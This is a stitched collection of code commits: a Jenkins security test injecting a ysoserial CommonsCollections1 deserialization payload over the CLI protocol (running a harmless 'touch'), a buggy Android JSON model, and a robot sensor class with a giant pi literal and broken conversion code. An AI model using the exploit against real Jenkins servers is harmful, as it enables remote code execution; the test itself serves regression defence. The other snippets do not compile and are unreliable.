@PresetData(PresetData.DataSet.ANONYMOUS_READONLY) // TODO userContent inaccessible without authentication otherwise @Test public void probe() throws Exception { JenkinsRule.WebClient wc = r.createWebClient(); final URL url = overrideURL == null ? 
r.getURL() : new URL(overrideURL); wc.getPage(url + "userContent/readme.txt"); try { wc.getPage(url + "userContent/pwned"); fail("already compromised?"); } catch (FailingHttpStatusCodeException x) { assertEquals(404, x.getStatusCode()); } for (int round = 0; round < 2; round++) { final int _round = round; final ServerSocket proxySocket = new ServerSocket(0); executors.submit(new Runnable() { @Override public void run() { try { Socket proxy = proxySocket.accept(); Socket real = new Socket(url.getHost(), ((HttpURLConnection) url.openConnection()).getHeaderFieldInt("X-Jenkins-CLI-Port", -1)); final InputStream realIS = real.getInputStream(); final OutputStream realOS = real.getOutputStream(); final InputStream proxyIS = proxy.getInputStream(); final OutputStream proxyOS = proxy.getOutputStream(); executors.submit(new Runnable() { @Override public void run() { try { // Read up to \x00\x00\x00\x00, end of header. int nullCount = 0; ByteArrayOutputStream buf = new ByteArrayOutputStream(); int c; while ((c = realIS.read()) != -1) { proxyOS.write(c); buf.write(c); if (c == 0) { if (++nullCount == 4) { break; } } else { nullCount = 0; } } System.err.print("← "); display(buf.toByteArray()); System.err.println(); // Now assume we are in chunked transport. PACKETS: while (true) { buf.reset(); //System.err.println("reading one packet"); while (true) { // one packet, ≥1 chunk //System.err.println("reading one chunk"); int hi = realIS.read(); if (hi == -1) { break PACKETS; } proxyOS.write(hi); int lo = realIS.read(); proxyOS.write(lo); boolean hasMore = (hi & 0x80) > 0; if (hasMore) { hi &= 0x7F; } int len = hi * 0x100 + lo; //System.err.printf("waiting for %X bytes%n", len); for (int i = 0; i < len; i++) { c = realIS.read(); proxyOS.write(c); buf.write(c); } if (hasMore) { continue; } System.err.print("← "); byte[] data = buf.toByteArray(); //display(data); showSer(data); System.err.println(); break; } } } catch (IOException x) { x.printStackTrace(); } } }); executors.submit(new Runnable() { @Override public void run() { try { ByteArrayOutputStream buf = new ByteArrayOutputStream(); ByteArrayOutputStream toCopy = new ByteArrayOutputStream(); int c; int nullCount = 0; while ((c = proxyIS.read()) != -1) { toCopy.write(c); buf.write(c); if (c == 0) { if (++nullCount == 4) { break; } } else { nullCount = 0; } } if (_round == 0) { System.err.println("injecting payload into capability negotiation"); // replacing \x00\x14Protocol:CLI-connect<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00 new DataOutputStream(realOS).writeUTF("Protocol:CLI-connect"); // TCP agent protocol byte[] PREAMBLE = "<===[JENKINS REMOTING CAPACITY]===>".getBytes("UTF-8"); // Capability realOS.write(PREAMBLE); OutputStream bss = BinarySafeStream.wrap(realOS); bss.write(payload()); bss.flush(); } else { System.err.print("→ "); display(buf.toByteArray()); System.err.println(); realOS.write(toCopy.toByteArray()); } int packet = 0; PACKETS: while (true) { buf.reset(); toCopy.reset(); while (true) { int hi = proxyIS.read(); if (hi == -1) { break PACKETS; } toCopy.write(hi); int lo = proxyIS.read(); toCopy.write(lo); boolean hasMore = (hi & 0x80) > 0; if (hasMore) { hi &= 0x7F; } int len = hi * 0x100 + lo; for (int i = 0; i < len; i++) { c = proxyIS.read(); toCopy.write(c); buf.write(c); } if (hasMore) { continue; } if (++packet == _round) { System.err.println("injecting payload into packet"); byte[] data = payload(); realOS.write(data.length / 256); 
realOS.write(data.length % 256); realOS.write(data); } else { System.err.print("→ "); byte[] data = buf.toByteArray(); //display(data); showSer(data); System.err.println(); realOS.write(toCopy.toByteArray()); } break; } } } catch (Exception x) { x.printStackTrace(); } } }); } catch (IOException x) { x.printStackTrace(); } } }); try { executors.submit(new Runnable() { @Override public void run() { // Bypassing _main because it does nothing interesting here. // Hardcoding CLI protocol version 1 (CliProtocol) because it is easier to sniff. try { new CLI(r.getURL()) { @Override protected CliPort getCliTcpPort(String url) throws IOException { return new CliPort(new InetSocketAddress(proxySocket.getInetAddress(), proxySocket.getLocalPort()), /* ignore identity */ null, 1); } }.execute("help"); } catch (Exception x) { x.printStackTrace(); } } }).get(5, TimeUnit.SECONDS); } catch (TimeoutException x) { System.err.println("CLI command timed out"); } try { wc.getPage(url + "userContent/pwned"); fail("Pwned!"); } catch (FailingHttpStatusCodeException x) { assertEquals(404, x.getStatusCode()); } } } private static synchronized void display(byte[] data) { for (byte c : data) { if (c >= ' ' && c <= '~') { System.err.write(c); } else { System.err.printf("\\x%02X", c); } } } private static synchronized void showSer(byte[] data) { try { Object o = Serializables.deserialize(data); System.err.print(o); } catch (Exception x) { System.err.printf("<%s>", x); } } /** An attack payload, as a Java serialized object ({@code \xAC\ED…}). */ private byte[] payload() throws Exception { File home = overrideHome == null ? r.jenkins.root : new File(overrideHome); // TODO find a Windows equivalent return Serializables.serialize(new CommonsCollections1().getObject("touch " + new File(new File(home, "userContent"), "pwned"))); } }
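The proxy threads in the test above speak the CLI remoting framing by hand: after the initial header (terminated by four NUL bytes), each packet travels as one or more chunks whose two-byte big-endian length carries a continuation flag in the high bit of the first byte. The helpers below restate that framing; they are derived only from the read/write logic visible in the test (single-chunk writes, high-bit continuation on reads) and are not the official remoting implementation.

import java.io.ByteArrayOutputStream;
import java.io.EOFException;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

public class ChunkFramingSketch {

    // Write one packet as a single chunk, mirroring realOS.write(data.length / 256) etc. in the test.
    // Payloads over 0x7FFF bytes would need the multi-chunk form.
    static void writeSingleChunk(OutputStream out, byte[] payload) throws IOException {
        if (payload.length > 0x7FFF) {
            throw new IllegalArgumentException("single-chunk sketch only");
        }
        out.write((payload.length >> 8) & 0x7F); // high bit clear: last chunk of the packet
        out.write(payload.length & 0xFF);
        out.write(payload);
        out.flush();
    }

    // Read one whole packet, concatenating chunks while the high bit of the length byte is set.
    static byte[] readPacket(InputStream in) throws IOException {
        ByteArrayOutputStream packet = new ByteArrayOutputStream();
        boolean more = true;
        while (more) {
            int hi = in.read();
            int lo = in.read();
            if (hi == -1 || lo == -1) {
                throw new EOFException("stream closed mid-frame");
            }
            more = (hi & 0x80) != 0;            // continuation flag
            int len = ((hi & 0x7F) << 8) | lo;  // 15-bit chunk length
            for (int i = 0; i < len; i++) {
                int c = in.read();
                if (c == -1) {
                    throw new EOFException("stream closed mid-chunk");
                }
                packet.write(c);
            }
        }
        return packet.toByteArray();
    }
}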
test/src/test/java/jenkins/security/Security218BlackBoxTest.java
/* * The MIT License * * Copyright 2015 CloudBees, Inc. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ package jenkins.security; import com.gargoylesoftware.htmlunit.FailingHttpStatusCodeException; import hudson.cli.CLI; import hudson.cli.CliPort; import hudson.remoting.BinarySafeStream; import hudson.util.DaemonThreadFactory; import java.io.ByteArrayOutputStream; import java.io.DataOutputStream; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.HttpURLConnection; import java.net.InetSocketAddress; import java.net.ServerSocket; import java.net.Socket; import java.net.URL; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import jenkins.security.security218.ysoserial.payloads.CommonsCollections1; import jenkins.security.security218.ysoserial.util.Serializables; import static org.junit.Assert.*; import org.junit.Test; import org.junit.Rule; import org.jvnet.hudson.test.JenkinsRule; import org.jvnet.hudson.test.recipes.PresetData; public class Security218BlackBoxTest { private static final String overrideURL = System.getenv("JENKINS_URL"); private static final String overrideHome = System.getenv("JENKINS_HOME"); static { assertTrue("$JENKINS_URL and $JENKINS_HOME must both be defined together", (overrideURL == null) == (overrideHome == null)); } private static final ExecutorService executors = Executors.newCachedThreadPool(new DaemonThreadFactory()); @Rule public JenkinsRule r = new JenkinsRule(); @SuppressWarnings("deprecation") // really mean to use getPage(String) @PresetData(PresetData.DataSet.ANONYMOUS_READONLY) // TODO userContent inaccessible without authentication otherwise @Test public void probe() throws Exception { JenkinsRule.WebClient wc = r.createWebClient(); final URL url = overrideURL == null ? 
r.getURL() : new URL(overrideURL); wc.getPage(url + "userContent/readme.txt"); try { wc.getPage(url + "userContent/pwned"); fail("already compromised?"); } catch (FailingHttpStatusCodeException x) { assertEquals(404, x.getStatusCode()); } for (int round = 0; round < 2; round++) { final int _round = round; final ServerSocket proxySocket = new ServerSocket(0); executors.submit(new Runnable() { @Override public void run() { try { Socket proxy = proxySocket.accept(); Socket real = new Socket(url.getHost(), ((HttpURLConnection) url.openConnection()).getHeaderFieldInt("X-Jenkins-CLI-Port", -1)); final InputStream realIS = real.getInputStream(); final OutputStream realOS = real.getOutputStream(); final InputStream proxyIS = proxy.getInputStream(); final OutputStream proxyOS = proxy.getOutputStream(); executors.submit(new Runnable() { @Override public void run() { try { // Read up to \x00\x00\x00\x00, end of header. int nullCount = 0; ByteArrayOutputStream buf = new ByteArrayOutputStream(); int c; while ((c = realIS.read()) != -1) { proxyOS.write(c); buf.write(c); if (c == 0) { if (++nullCount == 4) { break; } } else { nullCount = 0; } } System.err.print("← "); display(buf.toByteArray()); System.err.println(); // Now assume we are in chunked transport. PACKETS: while (true) { buf.reset(); //System.err.println("reading one packet"); while (true) { // one packet, ≥1 chunk //System.err.println("reading one chunk"); int hi = realIS.read(); if (hi == -1) { break PACKETS; } proxyOS.write(hi); int lo = realIS.read(); proxyOS.write(lo); boolean hasMore = (hi & 0x80) > 0; if (hasMore) { hi &= 0x7F; } int len = hi * 0x100 + lo; //System.err.printf("waiting for %X bytes%n", len); for (int i = 0; i < len; i++) { c = realIS.read(); proxyOS.write(c); buf.write(c); } if (hasMore) { continue; } System.err.print("← "); byte[] data = buf.toByteArray(); //display(data); showSer(data); System.err.println(); break; } } } catch (IOException x) { x.printStackTrace(); } } }); executors.submit(new Runnable() { @Override public void run() { try { ByteArrayOutputStream buf = new ByteArrayOutputStream(); ByteArrayOutputStream toCopy = new ByteArrayOutputStream(); int c; int nullCount = 0; while ((c = proxyIS.read()) != -1) { toCopy.write(c); buf.write(c); if (c == 0) { if (++nullCount == 4) { break; } } else { nullCount = 0; } } if (_round == 0) { System.err.println("injecting payload into capability negotiation"); // replacing \x00\x14Protocol:CLI-connect<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00 new DataOutputStream(realOS).writeUTF("Protocol:CLI-connect"); // TCP agent protocol byte[] PREAMBLE = "<===[JENKINS REMOTING CAPACITY]===>".getBytes("UTF-8"); // Capability realOS.write(PREAMBLE); OutputStream bss = BinarySafeStream.wrap(realOS); bss.write(payload()); bss.flush(); } else { System.err.print("→ "); display(buf.toByteArray()); System.err.println(); realOS.write(toCopy.toByteArray()); } int packet = 0; PACKETS: while (true) { buf.reset(); toCopy.reset(); while (true) { int hi = proxyIS.read(); if (hi == -1) { break PACKETS; } toCopy.write(hi); int lo = proxyIS.read(); toCopy.write(lo); boolean hasMore = (hi & 0x80) > 0; if (hasMore) { hi &= 0x7F; } int len = hi * 0x100 + lo; for (int i = 0; i < len; i++) { c = proxyIS.read(); toCopy.write(c); buf.write(c); } if (hasMore) { continue; } if (++packet == _round) { System.err.println("injecting payload into packet"); byte[] data = payload(); realOS.write(data.length / 256); 
realOS.write(data.length % 256); realOS.write(data); } else { System.err.print("→ "); byte[] data = buf.toByteArray(); //display(data); showSer(data); System.err.println(); realOS.write(toCopy.toByteArray()); } break; } } } catch (Exception x) { x.printStackTrace(); } } }); } catch (IOException x) { x.printStackTrace(); } } }); try { executors.submit(new Runnable() { @Override public void run() { // Bypassing _main because it does nothing interesting here. // Hardcoding CLI protocol version 1 (CliProtocol) because it is easier to sniff. try { new CLI(r.getURL()) { @Override protected CliPort getCliTcpPort(String url) throws IOException { return new CliPort(new InetSocketAddress(proxySocket.getInetAddress(), proxySocket.getLocalPort()), /* ignore identity */ null, 1); } }.execute("help"); } catch (Exception x) { x.printStackTrace(); } } }).get(5, TimeUnit.SECONDS); } catch (TimeoutException x) { System.err.println("CLI command timed out"); } try { wc.getPage(url + "userContent/pwned"); fail("Pwned!"); } catch (FailingHttpStatusCodeException x) { assertEquals(404, x.getStatusCode()); } } } private static synchronized void display(byte[] data) { for (byte c : data) { if (c >= ' ' && c <= '~') { System.err.write(c); } else { System.err.printf("\\x%02X", c); } } } private static synchronized void showSer(byte[] data) { try { Object o = Serializables.deserialize(data); System.err.print(o); } catch (Exception x) { System.err.printf("<%s>", x); } } /** An attack payload, as a Java serialized object ({@code \xAC\ED…}). */ private byte[] payload() throws Exception { File home = overrideHome == null ? r.jenkins.root : new File(overrideHome); // TODO find a Windows equivalent return Serializables.serialize(new CommonsCollections1().getObject("touch " + new File(new File(home, "userContent"), "pwned"))); } }
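Both versions of the test lean on jenkins.security.security218.ysoserial.util.Serializables to turn objects into the raw Java serialization stream and back for display in showSer(...). The plain java.io sketch below is an assumption about what such helpers typically look like, not the actual source of that utility class.

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;

public final class SerializablesSketch {

    // Object -> serialization bytes (the \xAC\xED... stream the test writes to the CLI port).
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(buf)) {
            oos.writeObject(o);
        }
        return buf.toByteArray();
    }

    // Bytes -> Object, as showSer(...) does to print whatever the wire carried.
    static Object deserialize(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            return ois.readObject();
        }
    }
}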
Need to rename environment variables since $JENKINS_URL is defined on CI.
test/src/test/java/jenkins/security/Security218BlackBoxTest.java
Need to rename environment variables since $JENKINS_URL is defined on CI.
<ide><path>est/src/test/java/jenkins/security/Security218BlackBoxTest.java <ide> <ide> public class Security218BlackBoxTest { <ide> <del> private static final String overrideURL = System.getenv("JENKINS_URL"); <del> private static final String overrideHome = System.getenv("JENKINS_HOME"); <add> private static final String overrideURL = System.getenv("VICTIM_JENKINS_URL"); <add> private static final String overrideHome = System.getenv("VICTIM_JENKINS_HOME"); <ide> static { <ide> assertTrue("$JENKINS_URL and $JENKINS_HOME must both be defined together", (overrideURL == null) == (overrideHome == null)); <ide> }
Java
mit
error: pathspec 'GenericLocationModel.java' did not match any file(s) known to git
4b9bf0e9cbccceedb77de198b39b0a22ebe10b4b
1
code-for-coffee/AndroidSnippets
public class GenericLocationModel { LocationModel(JSONObject Json) throws JSONException, MalformedURLException { for(int i = 0; i< Json.names().length(); i++){ String key = Json.names().getString(i); String val = Json.get(Json.names().getString(i)).toString(); switch (val) { case "city": this.City = val; break; case "name": this.Name = val; break; case "website_url": this.Url = new URL(val); break; case "id": this.Id = new Integer(val); break; case "address": this.Address = val; break; case "state": this.State = val; break; case "zipcode": this.ZipCode = val; break; case "latitude": this.Latitude = new Double(val); break; case "longitude": this.Longitude = new Double(val); break; case "photo": this.Photo = new URL(val); break; case "email": this.Email = val; break; } } } // public information public Integer Id; public String City; public String Name; public URL Url; public String Address; public String State; public String ZipCode; public Double Latitude; public Double Longitude; public URL Photo; public String Email; public Integer getId() { return Id; } public void setId(Integer id) { Id = id; } public String getCity() { return City; } public void setCity(String city) { City = city; } public String getName() { return Name; } public void setName(String name) { Name = name; } public URL getUrl() { return Url; } public void setUrl(URL url) { Url = url; } public String getAddress() { return Address; } public void setAddress(String address) { Address = address; } public String getState() { return State; } public void setState(String state) { State = state; } public String getZipCode() { return ZipCode; } public void setZipCode(String zipCode) { ZipCode = zipCode; } public Double getLatitude() { return Latitude; } public void setLatitude(Double latitude) { Latitude = latitude; } public Double getLongitude() { return Longitude; } public void setLongitude(Double longitude) { Longitude = longitude; } public URL getPhoto() { return Photo; } public void setPhoto(URL photo) { Photo = photo; } public String getEmail() { return Email; } public void setEmail(String email) { Email = email; } }
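The constructor above iterates the JSON field names but switches on the value string, and its name does not match the enclosing class, so it would not populate or compile as written. The fragment below is a minimal compiling variant of the same mapping loop, keyed on the field name and covering a subset of the fields; it assumes the org.json classes that the original appears to use, and the remaining fields would follow the same pattern.

import java.net.MalformedURLException;
import java.net.URL;
import org.json.JSONException;
import org.json.JSONObject;

public class LocationModelSketch {
    public Integer id;
    public String city;
    public URL url;
    public Double latitude;

    LocationModelSketch(JSONObject json) throws JSONException, MalformedURLException {
        for (int i = 0; i < json.names().length(); i++) {
            String key = json.names().getString(i);          // the JSON field name
            String val = json.get(key).toString();           // its value as a string
            switch (key) {                                   // key, not value, selects the field
                case "id":          this.id = Integer.valueOf(val);     break;
                case "city":        this.city = val;                    break;
                case "website_url": this.url = new URL(val);            break;
                case "latitude":    this.latitude = Double.valueOf(val); break;
                // name, address, state, zipcode, longitude, photo, email: same pattern
            }
        }
    }
}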
GenericLocationModel.java
adding a generic location file that expects some json
GenericLocationModel.java
adding a generic location file that expects some json
<ide><path>enericLocationModel.java <add>public class GenericLocationModel { <add> <add> LocationModel(JSONObject Json) throws JSONException, MalformedURLException { <add> <add> for(int i = 0; i< Json.names().length(); i++){ <add> String key = Json.names().getString(i); <add> String val = Json.get(Json.names().getString(i)).toString(); <add> <add> switch (val) { <add> case "city": <add> this.City = val; <add> break; <add> case "name": <add> this.Name = val; <add> break; <add> case "website_url": <add> this.Url = new URL(val); <add> break; <add> case "id": <add> this.Id = new Integer(val); <add> break; <add> case "address": <add> this.Address = val; <add> break; <add> case "state": <add> this.State = val; <add> break; <add> case "zipcode": <add> this.ZipCode = val; <add> break; <add> case "latitude": <add> this.Latitude = new Double(val); <add> break; <add> case "longitude": <add> this.Longitude = new Double(val); <add> break; <add> case "photo": <add> this.Photo = new URL(val); <add> break; <add> case "email": <add> this.Email = val; <add> break; <add> } <add> } <add> } <add> <add> // public information <add> public Integer Id; <add> public String City; <add> public String Name; <add> public URL Url; <add> public String Address; <add> public String State; <add> public String ZipCode; <add> public Double Latitude; <add> public Double Longitude; <add> public URL Photo; <add> public String Email; <add> <add> public Integer getId() { <add> return Id; <add> } <add> <add> public void setId(Integer id) { <add> Id = id; <add> } <add> <add> public String getCity() { <add> return City; <add> } <add> <add> public void setCity(String city) { <add> City = city; <add> } <add> <add> public String getName() { <add> return Name; <add> } <add> <add> public void setName(String name) { <add> Name = name; <add> } <add> <add> public URL getUrl() { <add> return Url; <add> } <add> <add> public void setUrl(URL url) { <add> Url = url; <add> } <add> <add> public String getAddress() { <add> return Address; <add> } <add> <add> public void setAddress(String address) { <add> Address = address; <add> } <add> <add> public String getState() { <add> return State; <add> } <add> <add> public void setState(String state) { <add> State = state; <add> } <add> <add> public String getZipCode() { <add> return ZipCode; <add> } <add> <add> public void setZipCode(String zipCode) { <add> ZipCode = zipCode; <add> } <add> <add> public Double getLatitude() { <add> return Latitude; <add> } <add> <add> public void setLatitude(Double latitude) { <add> Latitude = latitude; <add> } <add> <add> public Double getLongitude() { <add> return Longitude; <add> } <add> <add> public void setLongitude(Double longitude) { <add> Longitude = longitude; <add> } <add> <add> public URL getPhoto() { <add> return Photo; <add> } <add> <add> public void setPhoto(URL photo) { <add> Photo = photo; <add> } <add> <add> public String getEmail() { <add> return Email; <add> } <add> <add> public void setEmail(String email) { <add> Email = email; <add> } <add>}
Java
bsd-3-clause
b270b052bf904ad6b4d6da49e052ac59cf47e3ae
0
amesrobotics/2013robot
/* * To change this template, choose Tools | Templates * and open the template in the editor. * * This class polls robot sensors and switches, such as gyros, buttons, and accelerometers. */ /* * This is a test to teach programming team. */ package edu.ames.frc.robot; import com.sun.squawk.util.MathUtils; import edu.wpi.first.wpilibj.Gyro; public class SensorInput { static RobotMap rm = new RobotMap(); static Gyro gy; // /* Initialize sensor values & variables */ void init() { gy = new Gyro(rm.gyroport); gy.reset(); } public void getFinalAngle(){ double rad = 0; rad = getGyroAngle(); rad = convertToRadian; } /* Get the absolute angle of the robot */ double getGyroAngle() { double a = gy.getAngle(); return a; } double convertToRadian(double deg){ deg = 180/3.1415926535897932384626433832795028841971693993751058209749445923078164062862089986280348253421170679821480865132823066470938446095505822317253594081284811174502841027019385211055596446229489549303819644288109756659334461284756482337867831652712019091456485669234603486104543266482133936072602491412737245870066063155881748815209209628292540917153643678925903600113305305488204665213841469519415116094330572703657595919530921861173819326117931051185480744623799627495673518857527248912279381830119491298336733624406566430860213949463952247371907021798609437027705392171762931767523846748184676694051320005681271452635608277857713427577896091736371787214684409012249534301465495853710507922796892589235420199561121290219608640344181598136297747713099605187072113499999983729780499510597317328160963185950244594553469083026425223082533446850352619311881710100031378387528865875332083814206171776691473035982534904287554687311595628638823537875937519577818577805321712268066130019278766111959092164201989380952572010654858632788659361533818279682303019520353018529689957736225994138912497217752834791315155748572424541506959508295331168617278558890750983817546374649393192550604009277016711390098488240128583616035637076601047101819429555961989467678374494482553797747268471040475346462080466842590694912933136770289891521047521620569660240580381501935112533824300355876402474964732639141992726042699227967823547816360093417216412199245863150302861829745557067498385054945885869269956909272107975093029553211653449872027559602364806654991198818347977535663698074265425278625518184175746728909777727938000816470600161452491921732172147723501414419735685481613611573525521334757418494684385233239073941433345477624168625189835694855620992192221842725502542568876717904946016534668049886272327917860857843838279679766814541009538837863609506800642251252051173929848960841284886269456042419652850222106611863067442786220391949450471237137869609563643719172874677646575739624138908658326459958133904780275900994657640789512694683983525957098258226205224894077267194782684826014769909026401363944374553050682034962524517493996514314298091906592509372216964615157098583874105978859597729754989301617539284681382686838689427741559918559252459539594310499725246808459872736446958486538367362226260991246080512438843904512441365497627807977156914359977001296160894416948685558484063534220722258284886481584560285060168427394522674676788952521385225499546667278239864565961163548862305774564980355936345681743241125150760694794510965960940252288797108931456691368672287489405601015033086179286809208747609178249385890097149096759852613655497818931297848216829989487226588048575640142704775551323796414515237462343645428584447952658678210511413547357395231134271661021359695362314429524849371871101457654
035902799344037420073105785390621983874478084784896833214457138687519435064302184531910484810053706146806749192781911979399520614196634287544406437451237181921799983910159195618146751426912397489409071864942319615679452080951465502252316038819301420937621378559566389377870830390697920773467221825625996615014215030680384477345492026054146659252014974428507325186660021324340881907104863317346496514539057962685610055081066587969981635747363840525714591028970641401109712062804390397595156771577004203378699360072305587631763594218731251471205329281918261861258673215791984148488291644706095752706957220917567116722910981690915280173506712748583222871835209353965725121083579151369882091444210067510334671103141267111369908658516398315019701651511685171437657618351556508849099898599823873455283316355076479185358932261854896321329330898570642046752590709154814165498594616371802709819943099244889575712828905923233260972997120844335732654893823911932597463667305836041428138830320382490375898524374417029132765618093773444030707469211201913020330380197621101100449293215160842444859637669838952286847831235526582131449576857262433441893039686426243410773226978028073189154411010446823252716201052652272111660396665573092547110557853763466820653109896526918620564769312570586356620185581007293606598764861179104533488503461136576867532494416680396265797877185560845529654126654085306143444318586769751456614068007002378776591344017127494704205622305389945613140711270004078547332699390814546646458807972708266830634328587856983052358089330657574067954571637752542021149557615814002501262285941302164715509792592309907965473761255176567513575178296664547791745011299614890304639947132962107340437518957359614589019389713111790429782856475032031986915140287080859904801094121472213179476477726224142548545403321571853061422881375850430633217518297986622371721591607716692547487389866549494501146540628433663937900397692656721463853067360965712091807638327166416274888800786925602902284721040317211860820419000422966171196377921337575114959501566049631862947265473642523081770367515906735023507283540567040386743513622224771589150495309844489333096340878076932599397805419341447377441842631298608099888687413260472156951623965864573021631598193195167353812974167729478672422924654366800980676928238280689964004824354037014163149658979409243237896907069779422362508221688957383798623001593776471651228935786015881617557829735233446042815126272037343146531977774160319906655418763979293344195215413418994854447345673831624993419131814809277771038638773431772075456545322077709212019051660962804909263601975988281613323166636528619326686336062735676303544776280350450777235547105859548702790814356240145171806246436267945612753181340783303362542327839449753824372058353114771199260638133467768796959703098339130771098704085913374641442822772634659470474587847787201927715280731767907707157213444730605700733492436931138350493163128404251219256517980694113528013147013047816437885185290928545201165839341965621349143415956258658655705526904965209858033850722426482939728584783163057777560688876446248246857926039535277348030480290058760758251047470916439613626760449256274204208320856611906254543372131535958450687724602901618766795240616342522577195429162991930645537799140373404328752628889639958794757291746426357455254079091451357111369410911939325191076020825202618798531887705842972591677813149699009019211697173727847684726860849003377024242916513005005168323364350389517029893922334517220138128069650117844087451960121228599371623130171144484640903890644
95444006198690754851602632750529834918740786680881833851022833450850486082503930213321971551843063545500766828294930413776552793975175461395398468339363830474611996653858153842056853386218672523340283087112328278921250771262946322956398989893582116745627010218356462201349671518819097303811980049734072396103685406643193950979019069963955245300545058068550195673022921913933918568034490398205955100226353536192041994745538593810234395544959778377902374216172711172364343543947822181852862408514006660443325888569867054315470696574745855033232334210730154594051655379068662733379958511562578432298827372319898757141595781119635833005940873068121602876496286744604774649159950549737425626901049037781986835938146574126804925648798556145372347867330390468838343634655379498641927056387293174872332083760112302991136793862708943879936201629515413371424892830722012690147546684765357616477379467520049075715552781965362132392640616013635815590742202020318727760527721900556148425551879253034351398442532234157623361064250639049750086562710953591946589751413103482276930624743536325691607815478181152843667957061108615331504452127473924544945423682886061340841486377670096120715124914043027253860764823634143346235189757664521641376796903149501910857598442391986291642193994907236234646844117394032659184044378051333894525742399508296591228508555821572503107125701266830240292952522011872676756220415420516184163484756516999811614101002996078386909291603028840026910414079288621507842451670908700069928212066041837180653556725253256753286129104248776182582976515795984703562226293486003415872298053498965022629174878820273420922224533985626476691490556284250391275771028402799806636582548892648802545661017296702664076559042909945681506526530537182941270336931378517860904070866711496558343434769338578171138645587367812301458768712660348913909562009939361031029161615288138437909904231747336394804575931493140529763475748119356709110137751721008031559024853090669203767192203322909433467685142214477379393751703443661991040337511173547191855046449026365512816228824462575916333039107225383742182140883508657391771509682887478265699599574490661758344137522397096834080053559849175417381883999446974867626551658276584835884531427756879002909517028352971634456212964043523117600665101241200659755851276178583829204197484423608007193045761893234922927965019875187212726750798125547095890455635792122103334669749923563025494780249011419521238281530911407907386025152274299581807247162591668545133312394804947079119153267343028244186041426363954800044800267049624820179289647669758318327131425170296923488962766844032326092752496035799646925650493681836090032380929345958897069536534940603402166544375589004563288225054525564056448246515187547119621844396582533754388569094113031509526179378002974120766514793942590298969594699556576121865619673378623625612521632086286922210327488921865436480229678070576561514463204692790682120738837781423356282360896320806822246801224826117718589638140918390367367222088832151375560037279839400415297002878307667094447456013455641725437090697939612257142989467154357846878861444; //All the decimals return deg; } /* useful to have, just in case our robot gyro drifts */ public void resetGyroAngle() { gy.reset(); } }
src/edu/ames/frc/robot/SensorInput.java
/* * To change this template, choose Tools | Templates * and open the template in the editor. * * This class polls robot sensors and switches, such as gyros, buttons, and accelerometers. */ /* * This is a test to teach programming team. */ package edu.ames.frc.robot; import edu.wpi.first.wpilibj.Gyro; public class SensorInput { static RobotMap rm = new RobotMap(); static Gyro gy; // /* Initialize sensor values & variables */ void init() { gy = new Gyro(rm.gyroport); gy.reset(); } /* Get the absolute angle of the robot */ double getGyroAngle() { double a = gy.getAngle(); return a; } /* useful to have, just in case our robot gyro drifts */ void resetGyroAngle() { gy.reset(); } }
Added PI XD
src/edu/ames/frc/robot/SensorInput.java
Added PI XD
<ide><path>rc/edu/ames/frc/robot/SensorInput.java <ide> * This is a test to teach programming team. <ide> */ <ide> package edu.ames.frc.robot; <del> <add>import com.sun.squawk.util.MathUtils; <ide> import edu.wpi.first.wpilibj.Gyro; <ide> <ide> public class SensorInput { <ide> gy = new Gyro(rm.gyroport); <ide> gy.reset(); <ide> } <add> public void getFinalAngle(){ <add> double rad = 0; <add> rad = getGyroAngle(); <add> rad = convertToRadian; <add> } <ide> <ide> /* Get the absolute angle of the robot */ <ide> double getGyroAngle() { <ide> double a = gy.getAngle(); <ide> return a; <ide> } <add> double convertToRadian(double deg){ <add> deg = 180/3.141592653589793238462643383279502884197169399375105820974944592307816406286208998628034825342117067982148086513282306647093844609550582231725359408128481117450284102701938521105559644622948954930381964428810975665933446128475648233786783165271201909145648566923460348610454326648213393607260249141273724587006606315588174881520920962829254091715364367892590360011330530548820466521384146951941511609433057270365759591953092186117381932611793105118548074462379962749567351885752724891227938183011949129833673362440656643086021394946395224737190702179860943702770539217176293176752384674818467669405132000568127145263560827785771342757789609173637178721468440901224953430146549585371050792279689258923542019956112129021960864034418159813629774771309960518707211349999998372978049951059731732816096318595024459455346908302642522308253344685035261931188171010003137838752886587533208381420617177669147303598253490428755468731159562863882353787593751957781857780532171226806613001927876611195909216420198938095257201065485863278865936153381827968230301952035301852968995773622599413891249721775283479131515574857242454150695950829533116861727855889075098381754637464939319255060400927701671139009848824012858361603563707660104710181942955596198946767837449448255379774726847104047534646208046684259069491293313677028989152104752162056966024058038150193511253382430035587640247496473263914199272604269922796782354781636009341721641219924586315030286182974555706749838505494588586926995690927210797509302955321165344987202755960236480665499